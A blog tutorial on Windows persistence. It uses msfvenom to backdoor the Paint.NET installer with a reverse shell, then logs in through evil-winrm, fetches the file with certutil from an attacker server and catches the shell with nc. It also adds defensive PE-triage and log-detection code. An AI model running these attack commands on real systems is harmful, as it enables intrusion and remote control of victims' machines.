Persistence on Windows with BackDoors (2/4)
- hamidullahbayram
- 11 May 2023
- 1 minute read
Updated: 19 May 2023
2. Using executable files modified by msfvenom

Let's continue placing a payload on the target machine. We can modify any small Windows tool that can be downloaded from the internet, such as PuTTY, WinRAR, a photo editor or Sticky Notes. I will use a third-party paint program, Paint.NET.
Here is the download link: https://www.getpaint.net/download.html
It is downloaded to the attacker's machine and modified with msfvenom (the Metasploit payload generator) on Kali:
msfvenom -a x64 --platform windows -x paint.net.5.0.3.exe -k -p windows/x64/shell_reverse_tcp lhost=attacker_IP lport=listener_nc -b "\x00" -f exe -o paint.exe
-a for the target architecture (x64 here)
--platform for the target OS
-x for the template executable to be modified
-k to keep the template's original behaviour and run the payload in a separate thread, so the program still looks normal to the user
-p for the payload
-b for bytes the encoded payload must avoid (here the null byte)
-f for the output file format
-o for the output file name
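From the defender's side, a binary produced this way differs from the vendor's original in ways that can be spotted before it is ever run: the Authenticode signature of the original is no longer valid, and the injected payload usually lives in an extra section with the entry point redirected into it. The following added example (my own code, not part of the original post or of msfvenom) parses the PE header and section table and reports those indicators. The sample image is constructed in `build_sample_pe` and is not a real program; a non-empty security directory only shows that a signature blob is present, so a real check should still validate it with `Get-AuthenticodeSignature` or `signtool`, and an entry point outside the first code section is a triage heuristic, not proof of tampering.

```python
import struct

# Section characteristics flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data directory holding the Authenticode blob


def parse_pe(pe: bytes):
    """Return (entry_point_rva, has_security_dir, [(name, rva, vsize, flags), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]          # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    dd_off = opt + (112 if magic == 0x20B else 96)        # start of the data directories
    num_dirs = struct.unpack_from("<I", pe, dd_off - 4)[0]
    sec_size = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        sec_size = struct.unpack_from("<I", pe, dd_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8 + 4)[0]
    sections = []
    hdr = opt + size_opt                                   # section table follows the optional header
    for i in range(num_sections):
        off = hdr + i * 40
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, rva = struct.unpack_from("<II", pe, off + 8)
        flags = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, rva, vsize, flags))
    return entry_rva, sec_size != 0, sections


def triage(pe: bytes) -> list:
    """Heuristic indicators that an executable was re-packed with a payload."""
    entry_rva, signed, sections = parse_pe(pe)
    findings = []
    if not signed:
        findings.append("no Authenticode signature directory")
    ep = next((s for s in sections if s[1] <= entry_rva < s[1] + s[2]), None)
    first_code = next((s for s in sections if s[3] & IMAGE_SCN_CNT_CODE), None)
    if ep is None:
        findings.append("entry point is outside every section")
    elif ep is not first_code:
        findings.append("entry point redirected to section %r (first code section is %r)"
                        % (ep[0], first_code[0] if first_code else None))
    for name, _rva, _vsize, flags in sections:
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append("section %r is writable and executable" % name)
    return findings


def build_sample_pe(trojanized: bool) -> bytes:
    """Constructed minimal PE32+ header (not a runnable program) for the demonstration."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    secs = [(b".text", 0x1000, 0x1000, rx),
            (b".data", 0x2000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)]
    entry = 0x1100
    if trojanized:
        # extra RWX section appended at the end, entry point moved into it
        secs.append((b".xyz", 0x3000, 0x1000, rx | IMAGE_SCN_MEM_WRITE))
        entry = 0x3000
    size_opt = 240
    coff = struct.pack("<HHIIIHH", 0x8664, len(secs), 0, 0, 0, size_opt, 0x22)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<I", opt, 108, 16)                   # NumberOfRvaAndSizes
    if not trojanized:
        struct.pack_into("<II", opt, 112 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8, 0x4000, 0x800)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, rva, vs, 0, 0, 0, 0, 0, fl)
                    for n, rva, vs, fl in secs)
    return bytes(dos) + b"PE\0\0" + coff + opt + hdrs


if __name__ == "__main__":
    for label, sample in (("original", build_sample_pe(False)), ("repacked", build_sample_pe(True))):
        print(label, triage(sample) or ["no indicators"])
```

Run it against a downloaded installer by replacing `build_sample_pe(...)` with `open(path, "rb").read()`; comparing the file's SHA-256 against the hash published by the vendor is the simplest check of all and should come first.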

Now we can access the target with the previously gained credentials to transfer the payload:
evil-winrm -i target_IP -u Administrator -p Password321

We can pull the payload onto the target machine with certutil, from an HTTP server running on the attacker machine:

certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe

Start a listener with nc on the attacker machine: nc -lvp 4444
Then execute the transferred payload in the shell we obtained: ./paint.exe
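Every step of this transfer-and-execute chain leaves a process-creation record: certutil started with -urlcache and a URL, and a child of the WinRM host process (wsmprovhost.exe) that is a freshly written executable rather than cmd or PowerShell. The following added detection example (my own code, not part of the original post) runs three rules over constructed, simplified process-creation events in a "timestamp|Image|ParentImage|CommandLine" form and correlates a certutil download with a later execution of the same file name. The event format and the assumption that an evil-winrm session appears as children of wsmprovhost.exe are assumptions of the example; real Sysmon Event ID 1 or Security 4688 records carry the same fields.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    ts: str
    image: str
    parent: str
    cmdline: str


# Constructed sample events (not real logs): a WinRM session downloads and runs a file,
# followed by two benign events that must not alert.
SAMPLE_LOG = """\
2023-05-11T10:01:02|C:\\Windows\\System32\\wsmprovhost.exe|C:\\Windows\\System32\\svchost.exe|wsmprovhost.exe -Embedding
2023-05-11T10:01:15|C:\\Windows\\System32\\certutil.exe|C:\\Windows\\System32\\wsmprovhost.exe|certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe
2023-05-11T10:01:40|C:\\Users\\Administrator\\Documents\\paint.exe|C:\\Windows\\System32\\wsmprovhost.exe|./paint.exe
2023-05-11T10:05:00|C:\\Windows\\System32\\certutil.exe|C:\\Windows\\System32\\cmd.exe|certutil.exe -hashfile C:\\Temp\\setup.msi SHA256
2023-05-11T10:06:00|C:\\Program Files\\paint.net\\paintdotnet.exe|C:\\Windows\\explorer.exe|"C:\\Program Files\\paint.net\\paintdotnet.exe"
"""

# certutil ... -urlcache ... <url> <destination>
URLCACHE_RE = re.compile(r"certutil(?:\.exe)?\s.*?-urlcache\s.*?(https?://\S+)\s+(\S+)", re.I)

# Children of the WinRM host that are normal for an interactive remote session
WINRM_EXPECTED_CHILDREN = {"cmd.exe", "powershell.exe", "conhost.exe"}


def parse_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, image, parent, cmdline = line.split("|", 3)
            events.append(Event(ts, image, parent, cmdline))
    return events


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (timestamp, rule, detail) tuples for the events that match a rule."""
    alerts = []
    downloaded = set()  # file names certutil has written, for the correlation rule
    for e in events:
        image, parent = basename(e.image), basename(e.parent)
        m = URLCACHE_RE.search(e.cmdline)
        if image == "certutil.exe" and m:
            downloaded.add(basename(m.group(2)))
            alerts.append((e.ts, "certutil used as a downloader", m.group(1)))
        if parent == "wsmprovhost.exe" and image not in WINRM_EXPECTED_CHILDREN:
            alerts.append((e.ts, "binary launched from a WinRM session", e.image))
        if image in downloaded and image != "certutil.exe":
            alerts.append((e.ts, "execution of a certutil-downloaded file", e.image))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(*alert)
```

The `-hashfile` invocation shows why the first rule keys on `-urlcache` plus a URL rather than on certutil alone: certutil has many legitimate uses, and a rule on the binary name would drown the real signal in noise.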
